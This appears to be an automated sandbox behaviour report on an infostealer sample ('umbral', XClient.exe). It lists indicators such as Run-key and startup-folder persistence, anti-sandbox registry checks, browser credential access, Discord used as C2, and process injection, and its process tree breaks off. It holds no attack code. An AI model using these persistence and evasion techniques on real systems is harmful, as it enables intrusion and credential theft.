umbral | f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	rootkit.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	www.DeadSecObbbfuscation.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	www.DeadSecObbbfuscation.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	www.DeadSecObbbfuscation.exe

Executes dropped EXE 5 IoCs

pid	Process
2808	www.DeadSecObbbfuscation.exe
4260	Modify.exe
4312	www.DeadSec0000000000-obfusecator.exe
3612	XClient.exe
1700	XClient.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe"	www.DeadSecObbbfuscation.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe"	rootkit.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
17	discord.com
19	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\XClient	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3688 set thread context of 3652	3688	powershell.EXE	121

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 21 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
1544	wmic.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 53 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1720461025"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE

Modifies registry class 4 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4324	schtasks.exe
2500	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
972	powershell.exe
972	powershell.exe
4200	powershell.exe
4200	powershell.exe
1468	powershell.exe
1468	powershell.exe
3068	powershell.exe
3068	powershell.exe
3688	powershell.EXE
3688	powershell.EXE
3684	powershell.exe
3684	powershell.exe
4964	powershell.exe
4964	powershell.exe
1896	powershell.exe
1896	powershell.exe
3048	powershell.exe
3048	powershell.exe
1072	powershell.exe
1072	powershell.exe
4864	powershell.exe
4864	powershell.exe
3688	powershell.EXE
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe
3652	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3440	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2808	www.DeadSecObbbfuscation.exe
Token: SeDebugPrivilege	972	powershell.exe
Token: SeDebugPrivilege	4260	Modify.exe
Token: SeDebugPrivilege	4200	powershell.exe
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeDebugPrivilege	3688	powershell.EXE
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeIncreaseQuotaPrivilege	1408	wmic.exe
Token: SeSecurityPrivilege	1408	wmic.exe
Token: SeTakeOwnershipPrivilege	1408	wmic.exe
Token: SeLoadDriverPrivilege	1408	wmic.exe
Token: SeSystemProfilePrivilege	1408	wmic.exe
Token: SeSystemtimePrivilege	1408	wmic.exe
Token: SeProfSingleProcessPrivilege	1408	wmic.exe
Token: SeIncBasePriorityPrivilege	1408	wmic.exe
Token: SeCreatePagefilePrivilege	1408	wmic.exe
Token: SeBackupPrivilege	1408	wmic.exe
Token: SeRestorePrivilege	1408	wmic.exe
Token: SeShutdownPrivilege	1408	wmic.exe
Token: SeDebugPrivilege	1408	wmic.exe
Token: SeSystemEnvironmentPrivilege	1408	wmic.exe
Token: SeRemoteShutdownPrivilege	1408	wmic.exe
Token: SeUndockPrivilege	1408	wmic.exe
Token: SeManageVolumePrivilege	1408	wmic.exe
Token: 33	1408	wmic.exe
Token: 34	1408	wmic.exe
Token: 35	1408	wmic.exe
Token: 36	1408	wmic.exe
Token: SeIncreaseQuotaPrivilege	1408	wmic.exe
Token: SeSecurityPrivilege	1408	wmic.exe
Token: SeTakeOwnershipPrivilege	1408	wmic.exe
Token: SeLoadDriverPrivilege	1408	wmic.exe
Token: SeSystemProfilePrivilege	1408	wmic.exe
Token: SeSystemtimePrivilege	1408	wmic.exe
Token: SeProfSingleProcessPrivilege	1408	wmic.exe
Token: SeIncBasePriorityPrivilege	1408	wmic.exe
Token: SeCreatePagefilePrivilege	1408	wmic.exe
Token: SeBackupPrivilege	1408	wmic.exe
Token: SeRestorePrivilege	1408	wmic.exe
Token: SeShutdownPrivilege	1408	wmic.exe
Token: SeDebugPrivilege	1408	wmic.exe
Token: SeSystemEnvironmentPrivilege	1408	wmic.exe
Token: SeRemoteShutdownPrivilege	1408	wmic.exe
Token: SeUndockPrivilege	1408	wmic.exe
Token: SeManageVolumePrivilege	1408	wmic.exe
Token: 33	1408	wmic.exe
Token: 34	1408	wmic.exe
Token: 35	1408	wmic.exe
Token: 36	1408	wmic.exe
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeIncreaseQuotaPrivilege	4612	wmic.exe
Token: SeSecurityPrivilege	4612	wmic.exe
Token: SeTakeOwnershipPrivilege	4612	wmic.exe
Token: SeLoadDriverPrivilege	4612	wmic.exe
Token: SeSystemProfilePrivilege	4612	wmic.exe
Token: SeSystemtimePrivilege	4612	wmic.exe
Token: SeProfSingleProcessPrivilege	4612	wmic.exe
Token: SeIncBasePriorityPrivilege	4612	wmic.exe
Token: SeCreatePagefilePrivilege	4612	wmic.exe
Token: SeBackupPrivilege	4612	wmic.exe
Token: SeRestorePrivilege	4612	wmic.exe
Token: SeShutdownPrivilege	4612	wmic.exe
Token: SeDebugPrivilege	4612	wmic.exe

Suspicious use of FindShellTrayWindow 46 IoCs

pid	Process
3440	Explorer.EXE
3440	Explorer.EXE
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
3440	Explorer.EXE
3440	Explorer.EXE
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
4824	taskmgr.exe
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE
3440	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3604 wrote to memory of 2808	3604	rootkit.exe	85
PID 3604 wrote to memory of 2808	3604	rootkit.exe	85
PID 3604 wrote to memory of 4260	3604	rootkit.exe	86
PID 3604 wrote to memory of 4260	3604	rootkit.exe	86
PID 3604 wrote to memory of 972	3604	rootkit.exe	87
PID 3604 wrote to memory of 972	3604	rootkit.exe	87
PID 4260 wrote to memory of 4200	4260	Modify.exe	89
PID 4260 wrote to memory of 4200	4260	Modify.exe	89
PID 3604 wrote to memory of 4324	3604	rootkit.exe	91
PID 3604 wrote to memory of 4324	3604	rootkit.exe	91
PID 3604 wrote to memory of 4312	3604	rootkit.exe	93
PID 3604 wrote to memory of 4312	3604	rootkit.exe	93
PID 3604 wrote to memory of 4312	3604	rootkit.exe	93
PID 4260 wrote to memory of 1468	4260	Modify.exe	94
PID 4260 wrote to memory of 1468	4260	Modify.exe	94
PID 4260 wrote to memory of 3068	4260	Modify.exe	98
PID 4260 wrote to memory of 3068	4260	Modify.exe	98
PID 4260 wrote to memory of 3684	4260	Modify.exe	100
PID 4260 wrote to memory of 3684	4260	Modify.exe	100
PID 4260 wrote to memory of 1408	4260	Modify.exe	103
PID 4260 wrote to memory of 1408	4260	Modify.exe	103
PID 2808 wrote to memory of 4964	2808	www.DeadSecObbbfuscation.exe	105
PID 2808 wrote to memory of 4964	2808	www.DeadSecObbbfuscation.exe	105
PID 4260 wrote to memory of 4612	4260	Modify.exe	107
PID 4260 wrote to memory of 4612	4260	Modify.exe	107
PID 4260 wrote to memory of 3364	4260	Modify.exe	109
PID 4260 wrote to memory of 3364	4260	Modify.exe	109
PID 2808 wrote to memory of 1896	2808	www.DeadSecObbbfuscation.exe	111
PID 2808 wrote to memory of 1896	2808	www.DeadSecObbbfuscation.exe	111
PID 4260 wrote to memory of 3048	4260	Modify.exe	113
PID 4260 wrote to memory of 3048	4260	Modify.exe	113
PID 4260 wrote to memory of 1544	4260	Modify.exe	115
PID 4260 wrote to memory of 1544	4260	Modify.exe	115
PID 2808 wrote to memory of 1072	2808	www.DeadSecObbbfuscation.exe	117
PID 2808 wrote to memory of 1072	2808	www.DeadSecObbbfuscation.exe	117
PID 2808 wrote to memory of 4864	2808	www.DeadSecObbbfuscation.exe	119
PID 2808 wrote to memory of 4864	2808	www.DeadSecObbbfuscation.exe	119
PID 3688 wrote to memory of 3652	3688	powershell.EXE	121
PID 3688 wrote to memory of 3652	3688	powershell.EXE	121
PID 3688 wrote to memory of 3652	3688	powershell.EXE	121
PID 3688 wrote to memory of 3652	3688	powershell.EXE	121
PID 3688 wrote to memory of 3652	3688	powershell.EXE	121
PID 3688 wrote to memory of 3652	3688	powershell.EXE	121
PID 3688 wrote to memory of 3652	3688	powershell.EXE	121
PID 3688 wrote to memory of 3652	3688	powershell.EXE	121
PID 3652 wrote to memory of 616	3652	dllhost.exe	5
PID 3652 wrote to memory of 672	3652	dllhost.exe	7
PID 3652 wrote to memory of 952	3652	dllhost.exe	12
PID 3652 wrote to memory of 64	3652	dllhost.exe	13
PID 3652 wrote to memory of 736	3652	dllhost.exe	14
PID 3652 wrote to memory of 896	3652	dllhost.exe	15
PID 3652 wrote to memory of 1112	3652	dllhost.exe	17
PID 3652 wrote to memory of 1164	3652	dllhost.exe	18
PID 3652 wrote to memory of 1172	3652	dllhost.exe	19
PID 3652 wrote to memory of 1180	3652	dllhost.exe	20
PID 3652 wrote to memory of 1252	3652	dllhost.exe	21
PID 3652 wrote to memory of 1304	3652	dllhost.exe	22
PID 3652 wrote to memory of 1316	3652	dllhost.exe	23
PID 3652 wrote to memory of 1424	3652	dllhost.exe	24
PID 3652 wrote to memory of 1456	3652	dllhost.exe	25
PID 3652 wrote to memory of 1520	3652	dllhost.exe	26
PID 3652 wrote to memory of 1528	3652	dllhost.exe	27
PID 3652 wrote to memory of 1668	3652	dllhost.exe	28
PID 3652 wrote to memory of 1676	3652	dllhost.exe	29

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:64
- C:\Windows\System32\dllhost.exe
